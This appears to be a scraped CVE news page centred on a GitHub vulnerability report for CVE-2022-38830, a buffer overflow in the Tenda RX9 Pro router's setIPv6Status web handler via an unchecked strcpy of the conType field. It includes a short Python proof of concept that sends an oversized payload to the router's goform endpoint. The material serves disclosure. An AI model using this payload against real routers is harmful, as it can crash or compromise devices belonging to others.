CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setIPv6Status.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setIPv6Status

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from conType and call strcpy, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setIPv6Status"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'conType': payload})

Headline

CVE-2022-38830: CVE/setIPv6Status.md at main · whiter6666/CVE

CVE: Latest News